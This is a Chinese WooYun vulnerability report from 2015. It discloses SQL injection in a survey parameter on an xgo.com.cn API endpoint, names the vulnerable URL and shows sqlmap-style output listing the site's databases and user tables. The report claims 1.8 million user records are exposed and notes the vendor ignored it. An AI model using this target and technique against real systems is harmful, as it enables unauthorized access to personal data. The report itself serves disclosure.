当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142524

漏洞标题:汽车点评某重要站点存在SQL注入(涉及180W用户)

相关厂商:xgo.com.cn

漏洞作者: 路人甲

提交时间:2015-09-21 11:25

修复时间:2015-09-26 11:26

公开时间:2015-09-26 11:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-21: 细节已通知厂商并且等待厂商处理中
2015-09-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://api.xgo.com.cn/show_survey.php?surveyid=2

21.png

available databases [20]:
[*] information_schema
[*] test
[*] xgo_active
[*] xgo_bbs
[*] xgo_bbs_admin
[*] xgo_bbs_troop
[*] xgo_comment
[*] xgo_picture
[*] xgo_plugin
[*] xgo_product
[*] xgo_product_stat
[*] xgo_review
[*] xgo_stat_hits
[*] xgo_tips
[*] xgo_tips_admin
[*] xgo_topic
[*] xgo_tuan
[*] xgo_user
[*] xgo_yongpin
[*] xgo_zhuqu

Database: xgo_user
[92 tables]
+---------------------------+
| user_relations            | 
| userinfo                  | 
| user_active_log           | 
| user_checkimg             | 
| user_album_pic            | 
| user_check_mobile_code    | 
| user_online               | 
| user_real                 | 
| user_extend               | 
| user_mail_set             | 
| user_message_2011         | 
| user_message_2014         | 
| user_register_log         | 
| user_message_2013         | 
| user_message              | 
| user_album_info           | 
| user_score                | 
| user_check_mail_code      | 
| user_oltime_2015          | 
| user_message_2012         | 
| user_oltime_2011          | 
| user_oltime_2013          | 
| userinfo_test             | 
| userinfo_new              | 
| user_visitor              | 
| user_oltime_2012          | 
| user_oltime_2014          | 
| x_invite_code             | 
| z_login_api               | 
| z_api_token               | 
| tag_from_pic              | 
| tag_from_user             | 
| user_car_list_product_rel | 
| x_user_score              | 
| x_userinfo_extend         | 
| x_log_login_2013          | 
| audit_log                 | 
| x_check_mail_code         | 
| user_comments             | 
| x_log_send_mail_2013      | 
| user_tag2                 | 
| x_register_history        | 
| user_album_pic_tags       | 
| user_carport              | 
| china_city                | 
| x_check_mobile_code       | 
| x_user_car                | 
| x_log_login_2015          | 
| user_interest_doc0        | 
| user_book_collection      | 
| x_log_login_2014          | 
| x_log_send_mail_2014      | 
| whitelistuser             | 
| x_log_modify_pwd_2013     | 
| user_obj_comments         | 
| tag                       | 
| user_car_list             | 
| user_tag_num              | 
| x_register                | 
| x_log_send_mail_2015      | 
| checkimg_group            | 
| china_town                | 
| gift_present              | 
| tag_user9                 | 
| tag_user1                 | 
| tag_user8                 | 
| x_oauth_bind              | 
| user_owner_info           | 
| tag_user7                 | 
| tag_user3                 | 
| user_hide                 | 
| x_log_modify_pwd_2014     | 
| tag_user5                 | 
| tag_user6                 | 
| z_login_api_bark          | 
| tag_user4                 |
| gift_buy                  | 
| tag_user2                 | 
| x_log_modify_pwd_2015     | 
| user_interest_doc17       | 
| user_car_list_vote_1      | 
| tag_user10                | 
| user_interest_doc18       | 
| china_province            | 
| user_tag1                 | 
| gift                      | 
| user_active_cate          | 
| user_rank                 | 
| gift_sort                 | 
| user_modify_pw_log        | 
| x_user_verify             | 
| xgo_qq_session            | 
+---------------------------+

涉及180万用户信息:

22.png

涉及登录用户名,密码,邮箱,手机等信息:

15.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-26 11:26

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无